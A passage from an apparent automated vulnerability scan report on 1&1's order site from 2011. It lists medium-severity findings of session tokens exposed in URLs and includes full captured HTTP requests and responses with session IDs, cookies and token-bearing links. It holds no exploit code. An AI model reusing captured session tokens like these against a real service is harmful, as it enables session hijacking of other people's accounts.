Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Found
Date: Sun, 20 Mar 2011 18:53:27 GMT
Server: Apache
Location: http://order.1and1.com/links/?__frame=_top&__lf=Static
Vary: Accept-Encoding
Content-Length: 307
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://order.1and1.com/links/?__frame=_top&amp;
...[SNIP]...

3.2. http://order.1and1.com/xml/order

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 14:50:52 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632652217
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: variant.configname=2010-04-14; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
Set-Cookie: UT=Ra2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSseJ1dgPTAxLSwxLSsuLCYuJSQ=; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 0


3.3. http://order.1and1.com/xml/order/AboutUs

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/AboutUs

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/AboutUs;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.about HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:36:07 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/AboutUs?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.about
Content-Length: 0
Connection: close
Content-Type: text/plain


3.4. http://order.1and1.com/xml/order/CloudDynamicServer

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:22 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1MjAwLy0rLTA=; Expires=Fri, 07-Apr-2079 21:07:29 GMT; Path=/
ETag: 9efbb6be51ecd3a77db1d7f5b7bc91f5
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 63287


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=CloudDynamicServer&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=CloudDynamicServer&amp;page=switch&amp;linkOrigin=CloudDynamicServer&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.tab.vps" rel="button-hd-tab-vps"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.tab.serverpremium" rel="button-hd-tab-serverpremium"><span>
...[SNIP]...
<p>Mobile monitoring of your server availability any time with
<a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerMonitoringCloud;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff"><strong>
...[SNIP]...
<span class="osLinux"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerDedOsLinuxOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<span class="osWindows"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerDedOsWindowsOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerMonitoringCloud;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details
</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsPlesk;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerProcessor;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureControlCenter;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerDedOsLinux;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerDedOsWindows;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerDedOsWindowsOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerDedOsLinuxOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsSB;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsPlesk;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureControlCenter;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerRecovery;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerSsl;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerFirewall;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureFtpBackup;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureWebdesignIstock;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsMerchandise;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureFtpBackup;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
</ul><a rel="height=480, width=665" class="btn btn-detail-lightblue window-open" href="/xml/order/popupServerOsCds;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">
Details
</a>
...[SNIP]...
</p><a rel="height=590, width=665" class="window-open" href="/xml/order/popupGreenPower;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
</p><a rel="height=480, width=643" class="window-open" href="/xml/order/popupPayPalInfo;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
<p>*Offers valid for a limited time only. "3 Months Free" offer valid on the Base Configuration only, with a 12 month minimum contract term. Setup fee and other terms and conditions may apply. <a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=CloudDynamicServer&amp;linkOrigin=CloudDynamicServer&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.5. http://order.1and1.com/xml/order/CloudDynamicServer

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The URL in the request carries a session token. The ;jsessionid= value is a URL path parameter (servlet URL rewriting), not a query-string parameter, so it sits in the request line, is typically written to proxy and server access logs, and leaks through the Referer header; the Referer of this request already carries the token from the previous page. The Cookie header holds no JSESSIONID cookie, so this URL parameter is what identifies the servlet session:

Request

GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:22 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1MjAwLy0rLTA=; Expires=Fri, 07-Apr-2079 21:07:29 GMT; Path=/
ETag: 9efbb6be51ecd3a77db1d7f5b7bc91f5
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 63287


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.6. http://order.1and1.com/xml/order/Contact

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Contact

Issue detail

The URL in the request carries a session token as a ;jsessionid= path parameter. The response is a 301 whose Location header repeats the path and query without the token, but the token had already left the client in this request:

Request

GET /xml/order/Contact;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.support HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:34:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Contact?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.support
Content-Length: 0
Connection: close
Content-Type: text/plain


3.7. http://order.1and1.com/xml/order/Domaininfo

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Domaininfo

Issue detail

